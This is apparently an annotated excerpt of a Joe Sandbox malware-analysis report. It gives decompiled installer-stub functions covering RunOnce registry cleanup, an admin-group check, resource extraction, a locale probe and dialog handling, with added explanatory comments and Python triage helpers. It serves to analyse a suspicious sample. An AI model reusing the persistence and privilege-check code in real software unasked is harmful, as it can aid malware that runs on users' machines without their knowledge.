                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402305
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0040236E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040237A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402321
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00402299
                                                                                                                                                                                                                                    • wextract_cleanup0, xrefs: 0040227C, 004022CD, 00402363
                                                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0040232D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                    • API String ID: 3027380567-2554356261
                                                                                                                                                                                                                                    • Opcode ID: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
                                                                                                                                                                                                                                    • Instruction ID: 8d6967f2b6b69c3bcd6c1b378378b2e216aa965ec765d16025e56e3eb759036c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31C871A002186BDB219F61DD49FDB777CEB54704F0001FAB94DB61D1DA786F88CA54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E00403100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                                                    					if( *0x408590 == 0) {
                                                                                                                                                                                                                                    						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                    						 *0x408590 = 1;
                                                                                                                                                                                                                                    					}
				L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					// The decompiler lost the second argument (??): it is the value pushed
					// just before, 0 on the L7 path and 1 on the _push(1) path below.
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					// Dialog set-up path (consistent with WM_INITDIALOG; _t8 is derived
					// from the message code above this fragment): fill control 0x834
					// from the string pointer at 0x408d4c, title the window "doza2",
					// bring it to the foreground, then subclass that control.
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E004043D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x408d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					// 0xfffffffc is GWL_WNDPROC (-4): save the control's original window
					// procedure in a global and install E004030C0 as the new one.
					 *0x4088b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E004030C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				// Button handling (_a12 is wParam if this is a standard DLGPROC):
				// 6 == IDYES closes the dialog with result 1, 7 == IDNO with result 0;
				// any other command is swallowed and reported as handled (return 1).
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0040313B
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040314B
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0040316A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00403176
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0040317D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00403185
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00403190
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,004030C0), ref: 004031A3
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004031CA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 3785188418-612509477
                                                                                                                                                                                                                                    • Opcode ID: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
                                                                                                                                                                                                                                    • Instruction ID: 246b5d21e6c1ac9ca4eb47d67caf4067a6fe804b44cd1f9aeadbe74bb776ad20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911B131204211BBDB115F64AE0CB5B3E68EB4E722F100636F855B92E0DBB89A51C78E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
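
An added example (not part of the Joe Sandbox report or of the analysed sample): a small Python parser for the "APIs" bullet list of a record like the one above, with a triage pass that recognises the GetWindowLongA/SetWindowLongA pair on GWL_WNDPROC that subclasses control 0x834 and decodes the EM_SETSEL message sent to the same control. The line format, the regular expression and the constant tables are my assumptions taken from how the lines are printed here, not a documented Joe Sandbox schema; the sample lines are copied from this record.

```python
"""Parse and triage the "APIs" list of a Joe Sandbox decompiler record.

Added example, not code from the report or the sample. The regex and the
constant tables are assumptions about the printed line format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Copied verbatim from the "APIs" list of the record above.
SAMPLE_APIS = """\
• EndDialog.USER32(?,00000000), ref: 0040313B
• GetDesktopWindow.USER32 ref: 0040314B
• SetDlgItemTextA.USER32(?,00000834), ref: 0040316A
• SetWindowTextA.USER32(?,doza2), ref: 00403176
• SetForegroundWindow.USER32(?), ref: 0040317D
• GetDlgItem.USER32(?,00000834), ref: 00403185
• GetWindowLongA.USER32(00000000,000000FC), ref: 00403190
• SetWindowLongA.USER32(00000000,000000FC,004030C0), ref: 004031A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004031CA
"""

# "• Name.MODULE(arg,arg), ref: ADDR"; calls without arguments drop the
# parentheses and the comma ("• GetDesktopWindow.USER32 ref: 0040314B").
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]   # as printed: 8 hex digits, a string literal, or "?"
    ref: int          # address of the call instruction

def parse_api_lines(text: str) -> list[ApiCall]:
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m is None:
            continue            # not an API bullet (headers, blank lines)
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls

def arg_value(arg: str) -> int | None:
    """Numeric arguments are printed as 8 hex digits; '?' (unknown at
    analysis time) and string arguments such as doza2 yield None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

def is_gwl_wndproc(value: int | None) -> bool:
    # GWL_WNDPROC is -4. The report prints the encoded immediate (000000FC)
    # while the decompiled C shows the sign-extended 0xfffffffc; accept both.
    return value in (0xFC, 0xFFFC, 0xFFFFFFFC)

SET_LONG = {"SetWindowLongA", "SetWindowLongW", "SetWindowLongPtrA", "SetWindowLongPtrW"}
GET_LONG = {"GetWindowLongA", "GetWindowLongW", "GetWindowLongPtrA", "GetWindowLongPtrW"}
DLG_ITEM = {"GetDlgItem", "SetDlgItemTextA", "SetDlgItemTextW",
            "SendDlgItemMessageA", "SendDlgItemMessageW"}
EDIT_MSGS = {0xB1: "EM_SETSEL"}   # only the edit-control message this record uses

@dataclass
class Finding:
    ref: int
    api: str
    note: str

def triage(calls: list[ApiCall]) -> list[Finding]:
    """Flag the window-subclassing pair and decode known control messages."""
    out: list[Finding] = []
    for c in calls:
        vals = [arg_value(a) for a in c.args]
        if c.name in GET_LONG and len(vals) >= 2 and is_gwl_wndproc(vals[1]):
            out.append(Finding(c.ref, c.name, "reads original WNDPROC (GWL_WNDPROC)"))
        elif c.name in SET_LONG and len(vals) >= 3 and is_gwl_wndproc(vals[1]):
            out.append(Finding(c.ref, c.name,
                               f"subclasses window: new WNDPROC at {c.args[2]}"))
        elif c.name.startswith("SendDlgItemMessage") and len(vals) >= 3 \
                and vals[2] in EDIT_MSGS:
            out.append(Finding(c.ref, c.name,
                               f"control {c.args[1]} gets {EDIT_MSGS[vals[2]]}"))
    return out

def control_ids(calls: list[ApiCall]) -> set[int]:
    """Dialog control IDs referenced through the *DlgItem* APIs (2nd argument)."""
    ids: set[int] = set()
    for c in calls:
        if c.name in DLG_ITEM and len(c.args) >= 2:
            v = arg_value(c.args[1])
            if v is not None:
                ids.add(v)
    return ids

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    print(f"{len(parsed)} calls; control IDs: {[hex(i) for i in sorted(control_ids(parsed))]}")
    for f in triage(parsed):
        print(f"{f.ref:08X} {f.api}: {f.note}")
```

Two caveats from the assumed format: the report prints negative immediates as their encoded byte (000000FC here, where the C view shows 0xfffffffc), so any constant comparison has to accept both widths; and a string argument that happens to be exactly eight hex characters would be misread as a number, so treat `arg_value` as a heuristic, not a type.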

                                                                                                                                                                                                                                    C-Code - Quality: 91%
			E004018A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				// /GS stack-cookie prologue: the module cookie at 0x408004 XORed with
				// the frame pointer (_t53); E00406CE0 at L20 is the matching check.
				_t23 =  *0x408004; // 0x8f135e3b
				_v8 = _t23 ^ _t53;
				_t25 =  *0x408128; // 0x2
				_t45 = 0;
				// _v16 (4 bytes) and _v12 (2 bytes) are adjacent on the stack; together
				// they hold {0,0,0,0,0,5}, i.e. SECURITY_NT_AUTHORITY, the authority of
				// the BUILTIN and NT AUTHORITY SIDs. The decompiler typed only the first
				// dword as the SID_IDENTIFIER_AUTHORITY.
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				// *0x408128 caches the result: 2 means "not evaluated yet"; any other
				// value returns at once through the cookie check at L20.
				if(_t25 != _t50) {
					L20:
					return E00406CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E004017EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x408128 = 1;
					}
					goto L20;
				}
				// Fallback when E004017EE fails: 8 == TOKEN_QUERY on the current process token.
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x408128 = 1;
                                                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
Instruction addresses for the listing above (decompiler address gutter, flattened during extraction): 0x004018a3 to 0x004019d8.

APIs
  • Part of subcall function 004017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
  • Part of subcall function 004017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040182C
  • Part of subcall function 004017EE: AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
  • Part of subcall function 004017EE: FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
  • Part of subcall function 004017EE: FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A
• GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 004018EB
• OpenProcessToken.ADVAPI32(00000000), ref: 004018F2
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0040190A
• GetLastError.KERNEL32 ref: 00401918
• LocalAlloc.KERNEL32(00000000,?,?), ref: 0040192C
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00401944
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401964
• EqualSid.ADVAPI32(00000004,?), ref: 0040197A
• FreeSid.ADVAPI32(?), ref: 0040199C
• LocalFree.KERNEL32(00000000), ref: 004019A3
• CloseHandle.KERNEL32(?), ref: 004019AD
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                                                    • Opcode ID: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
                                                                                                                                                                                                                                    • Instruction ID: 25d17cb087145c015d5063b66ab4b84c81c4c11853c483eeef0c9c8ad6c8a379
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F312DB1A00209AFDB109FA5DD98AAFBBBCFF48704F50043AE545F61A0D7389915CB69
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 82%
E0040468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;
	_t11 = __edx;
	/* size of the RT_RCDATA (0xa) resource named by __ecx */
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		/* copy the resource bytes into the caller's buffer (__edx, capacity _a4) */
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}
APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
• SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
• LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
• LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
• memcpy_s.MSVCRT ref: 004046E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$doza2
• API String ID: 3370778649-4167907646
• Opcode ID: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
• Instruction ID: 79f0873ee19441588a253031faa3d29a4edaeb9cce06827ffb284520bab3e3ef
• Opcode Fuzzy Hash: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
• Instruction Fuzzy Hash: B801F9722403047BE3101BA59D0CF2B3E2CDBC6F51F044435FB49B7280D9B6886192BE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E0040681F(void* __ebx) {
	signed int _v8;
	char _v20;
	struct _OSVERSIONINFOA _v168;
	void* _v172;
	int* _v176;
	int _v180;
	int _v184;
	void* __edi;
	void* __esi;
	signed int _t19;
	long _t31;
	signed int _t35;
	void* _t36;
	int** _t40; /* added: used below but left undeclared in the decompiler output */
	intOrPtr _t41;
	long _t43;  /* added: used below but left undeclared in the decompiler output */
	signed int _t44;

	_t36 = __ebx;
	_t19 =  *0x408004; // 0x8f135e3b  (stack-cookie seed)
	_v8 = _t19 ^ _t44;
	_t41 =  *0x4081d8; // 0x0
	_t43 = 0;
	_v180 = 0xc;
	_v176 = 0;
	if(_t41 == 0xfffffffe) {
		 *0x4081d8 = 0;
		_v168.dwOSVersionInfoSize = 0x94;
		if(GetVersionExA( &_v168) == 0) {
			L12:
			_t41 =  *0x4081d8; // 0x0
		} else {
			_t41 = 1;
			/* Win9x (platform 1, major 4, minor < 10) with SM_MIDEASTENABLED (0x4a) set: read the ResourceLocale value */
			if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
				goto L12;
			} else {
				_t31 = RegQueryValueExA(_v172, 0x401140, 0,  &_v184,  &_v20,  &_v180);
				_t43 = _t31;
				RegCloseKey(_v172);
				if(_t31 != 0) {
					goto L12;
				} else {
					_t40 =  &_v176;
					if(E004066F9( &_v20,  &_v176) == 0) {
						goto L12;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                    									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                    										 *0x4081d8 = _t41;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t18 =  &_v8; // 0x40463b
                                                                                                                                                                                                                                    				return E00406CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                    			}

Offsets (per-line instruction address column, flattened by extraction): 0x0040681f 0x0040682a 0x00406831 0x00406836 0x0040683c 0x0040683e 0x00406848 0x00406851 0x0040685d 0x00406864 0x00406876 0x0040693a 0x0040693a 0x0040687c 0x0040687e 0x00406885 0x00000000 0x004068d6 0x004068f4 0x00406900 0x00406902 0x0040690a 0x00000000 0x0040690c 0x0040690c 0x0040691c 0x00000000 0x0040691e 0x00406924 0x0040692b 0x00406932 0x00000000 0x00000000 0x00000000 0x0040692b 0x0040691c 0x0040690a 0x00406885 0x00406876 0x00406940 0x00406951

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
• GetSystemMetrics.USER32(0000004A), ref: 004068A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
• RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
• RegCloseKey.ADVAPI32(?), ref: 00406902
  • Part of subcall function 004066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0040691A), ref: 00406741
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: ;F@$Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-4093955092
• Opcode ID: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
• Instruction ID: e57de408b3f85bc4f8b92cc567276c2474f6d04b58f3ec5ba2619b9cb5330980
• Opcode Fuzzy Hash: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
• Instruction Fuzzy Hash: 14318471A003289FDB21CF15CD44BAB7778EF45718F0101BAE98AB6290DB349D95CF5A
Uniqueness
Uniqueness Score: -1.00%
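The decompiled function above is environment probing rather than stealer logic: it sets a global flag only when the host is Windows 95 with Middle-East language support and an Arabic or Hebrew user locale, and every other branch leaves the flag at zero. As an added example (not code from the sample and not part of the Joe Sandbox report), the Python below models that decision with the documented Win32 constants spelled out so the magic numbers in the listing can be checked. The registry-string parsing is an assumption: the report only shows that the helper at 0x4066F9 walks the value with CharNextA, so treating it as a hex LCID string such as "00000409" is my reading, not something the listing proves.

```python
"""Model of the Windows 95 right-to-left locale check shown in the decompile.

Added example; the constants are the documented Win32 values, the parsing of
the ResourceLocale string is an assumption about the helper at 0x4066F9.
"""
from typing import Optional

VER_PLATFORM_WIN32_WINDOWS = 1   # dwPlatformId for the Windows 9x/ME family
LANG_ARABIC = 0x01
LANG_HEBREW = 0x0D
SM_MIDEASTENABLED = 0x4A         # GetSystemMetrics index the sample queries (74)
RESOURCE_LOCALE_KEY = r"HKCU\Control Panel\Desktop\ResourceLocale"


def primary_lang_id(lcid: int) -> int:
    """PRIMARYLANGID(): the low 10 bits, i.e. the '& 0x000003ff' in the listing."""
    return lcid & 0x3FF


def parse_resource_locale(value: Optional[str]) -> Optional[int]:
    """Turn the ResourceLocale REG_SZ (assumed to look like '00000409') into an LCID.

    Returns None wherever the sample's helper returns 0: missing value, empty
    string, non-hex text, or something longer than a 32-bit LCID.
    """
    if value is None:
        return None
    text = value.strip("\x00").strip()
    if not text or len(text) > 8:
        return None
    try:
        return int(text, 16)
    except ValueError:
        return None


def win95_rtl_flag(platform_id: int, major: int, minor: int,
                   mideast_enabled: int, resource_locale: Optional[str]) -> int:
    """Return the value the function leaves in the global at 0x4081d8.

    The flag becomes 1 only for Windows 95 (platform 1, version 4.0-4.9; 98 is
    4.10 and ME is 4.90) whose system metrics report Middle-East support and
    whose user locale is Arabic or Hebrew.  Every other branch is a 'goto L12'
    in the decompile and keeps the flag at 0.
    """
    if platform_id != VER_PLATFORM_WIN32_WINDOWS or major != 4 or minor >= 0x0A:
        return 0
    if mideast_enabled == 0:            # GetSystemMetrics(SM_MIDEASTENABLED) == 0
        return 0
    lcid = parse_resource_locale(resource_locale)
    if lcid is None:                    # RegOpenKeyExA / RegQueryValueExA / parse failure
        return 0
    return 1 if primary_lang_id(lcid) in (LANG_ARABIC, LANG_HEBREW) else 0


if __name__ == "__main__":
    # Constructed inputs, one per branch of the check.
    cases = [
        ("Win95, ar-SA", (1, 4, 0, 1, "00000401")),
        ("Win95, he-IL", (1, 4, 0, 1, "0000040D")),
        ("Win95, en-US", (1, 4, 0, 1, "00000409")),
        ("Win98, ar-SA", (1, 4, 10, 1, "00000401")),
        ("NT 5.1, ar-SA", (2, 5, 1, 1, "00000401")),
        ("Win95, no MidEast", (1, 4, 0, 0, "00000401")),
        ("Win95, bad value", (1, 4, 0, 1, "not-a-lcid")),
    ]
    for label, args in cases:
        print(f"{label:20s} -> flag {win95_rtl_flag(*args)}")
```

The Arabic/Hebrew test uses the primary language ID only, so sublanguage variants (for example LCID 0x0C01, Arabic/Egypt) are treated the same way as 0x0401, which is exactly what masking with 0x3ff does in the listing.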

C-Code - Quality: 100%
			E00403450(struct HWND__* _a4, intOrPtr _a8, int _a12) { // dialog procedure: _a4 = hDlg, _a8 = uMsg, _a12 = wParam
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) { // uMsg == WM_CLOSE (0x10)
					EndDialog(_a4, 2); // IDCANCEL
					L11:
					return 1; // TRUE: message handled
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) { // uMsg == WM_INITDIALOG (0x110)
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E004043D0(_t24, _t12); // helper not shown; presumably positions the dialog relative to the desktop window
					SetWindowTextA(_t24, "doza2"); // hard-coded window title
					SetDlgItemTextA(_t24, 0x838,  *0x409404); // control 2104 receives the string the global at 0x409404 points to
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) { // uMsg == WM_COMMAND (0x111)
					_t22 = _a12; // command / control identifier from wParam
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) { // IDYES (6) or IDNO (7)
						L8:
						EndDialog(_a4, _t22); // close the dialog and return the button identifier
						return 1;
					}
					if(_t22 != 0x839) { // only control 2105 is handled beyond the two buttons
						goto L11;
					}
					 *0x4091dc = 1; // global flag: control 2105 was chosen
					goto L8;
				}
				return 0; // FALSE: message not handled
			}

Control-flow graph blocks: 0x00403459, 0x0040345c, 0x004034d8, 0x004034de, 0x004034e0, 0x0040345e, 0x00403463, 0x0040349a, 0x004034a0, 0x004034a7, 0x004034b2, 0x004034c4, 0x004034cb, 0x00403468, 0x0040346e, 0x00403474, 0x0040347c, 0x0040348c, 0x00403490, 0x00403496, 0x00403484, 0x00403486

APIs
